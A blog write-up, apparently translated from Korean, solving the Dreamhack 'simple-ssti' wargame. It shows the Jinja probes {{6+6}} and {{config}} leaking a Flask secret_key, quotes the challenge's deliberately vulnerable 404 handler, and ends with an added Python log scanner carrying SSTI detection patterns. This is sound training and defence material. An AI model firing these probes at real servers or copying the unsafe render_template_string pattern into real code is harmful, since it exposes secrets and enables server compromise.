🔒 Cyber Security/Web Hacking

[Dreamhack] Dreamhack Web Hacking: simple-ssti

선달 2023. 11. 17. 12:14
๋ฐ˜์‘ํ˜•

https://dreamhack.io/wargame/challenges/39

 

simple-ssti

A service that returns a 404 error when you visit a page that does not exist. Use the SSTI vulnerability to obtain the flag. The flag is in flag.txt and in the FLAG variable. Reference: Server-side Basic

dreamhack.io

 

Problem description

A service that returns a 404 error when you visit a page that does not exist.
Use the SSTI vulnerability to obtain the flag. The flag is in flag.txt and in the FLAG variable.

 

Solution

This problem requires knowing about SSTI. Background knowledge of Flask is also needed.

I have used Flask before (I used it to build a really simple blog auto table-of-contents generator project), so I know its structure and syntax to some degree, but if you are not familiar with it, the article below, which explains it clearly, should be a good reference.

 

๋ฐ˜์‘ํ˜•
 

Analysis of SSTI Vulnerabilities Based on Web Template Engines

01. Preliminary steps for understanding the SSTI vulnerability. An SSTI (Server Side Template Injection) vulnerability is a state in which an attacker's attack code has been included in the template of the web template engine (Web Template Engine) used by a web application

www.igloo.co.kr

 

There is not even any separate functionality: if you just enter a path, the service prints that path back.

 

http://host3.dreamhack.games:19321/안녕

 

Since the string in the path is echoed back as-is, let's now try an arithmetic operation.

If we put in {{6+6}} and the expression is evaluated, the engine is Jinja (the template engine Flask uses), so the follow-up work is possible.

 

http://host3.dreamhack.games:19321/{{6+6}}

 

It works perfectly.

 

http://host3.dreamhack.games:19321/{{config}}

When I entered the URL above, the whole config was printed, and the secret_key inside it contains the flag.

 

#!/usr/bin/python3
from flask import Flask, request, render_template, render_template_string, make_response, redirect, url_for
import socket

app = Flask(__name__)

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

app.secret_key = FLAG


@app.route('/')
def index():
    return render_template('index.html')

@app.errorhandler(404)
def Error404(e):
    # The (already percent-decoded) request path is formatted into the template
    # source itself instead of being passed to the template as a variable, so any
    # Jinja syntax in the URL is evaluated by render_template_string (the SSTI).
    template = '''
    <div class="center">
        <h1>Page Not Found.</h1>
        <h3>%s</h3>
    </div>
''' % (request.path)
    return render_template_string(template), 404

app.run(host='0.0.0.0', port=8000)

 

Looking at the challenge code, FLAG is assigned to app.secret_key, so looking up secret_key in config is another way to solve it.
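As an added example (not from the original post or from Dreamhack), the detection logic below scans access-log lines for the kind of probe shown above: it parses each line, percent-decodes the path that the 404 handler would echo, and flags paths carrying Jinja delimiters, separately marking those that reach for config or object internals. The log format, the sample lines and the verdict names are assumptions.

```python
import re
from urllib.parse import unquote

# Jinja's expression, statement and comment delimiters.
TEMPLATE_DELIMS = re.compile(r"\{\{|\{%|\{#")
# Names a probe reaches for once {{ }} is known to evaluate (config holds secret_key).
SENSITIVE_NAMES = re.compile(r"\b(config|self|request|__class__|__globals__|__subclasses__)\b")
# Combined/common access-log format (assumed; adjust to your server's format).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def classify(line):
    """Parse one access-log line and return (decoded_path, verdict), or None if it does not parse."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    # The challenge's 404 handler renders request.path, which Flask has already
    # percent-decoded, so match on the decoded form rather than the raw request line.
    path = unquote(m.group("path"))
    if not TEMPLATE_DELIMS.search(path):
        return path, "clean"
    if SENSITIVE_NAMES.search(path):
        return path, "ssti-probe-sensitive"
    return path, "ssti-probe"


def scan(lines):
    """Return the (path, verdict) pairs of every line whose path carries template syntax."""
    hits = []
    for line in lines:
        result = classify(line)
        if result is not None and result[1] != "clean":
            hits.append(result)
    return hits


# Constructed sample lines modelled on the requests shown in the write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Nov/2023:12:10:01 +0900] "GET / HTTP/1.1" 200 512',
    '10.0.0.5 - - [17/Nov/2023:12:10:20 +0900] "GET /%EC%95%88%EB%85%95 HTTP/1.1" 404 95',
    '10.0.0.5 - - [17/Nov/2023:12:11:02 +0900] "GET /%7B%7B6+6%7D%7D HTTP/1.1" 404 93',
    '10.0.0.5 - - [17/Nov/2023:12:12:40 +0900] "GET /%7B%7Bconfig%7D%7D HTTP/1.1" 404 2048',
]

if __name__ == "__main__":
    for path, verdict in scan(SAMPLE_LOG):
        print(f"{verdict:22} {path}")
```

Matching on the decoded path matters because a browser sends the braces percent-encoded, so a filter that looks for a literal "{{" in the raw request line misses exactly the requests the challenge accepts.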

๋ฐ˜์‘ํ˜•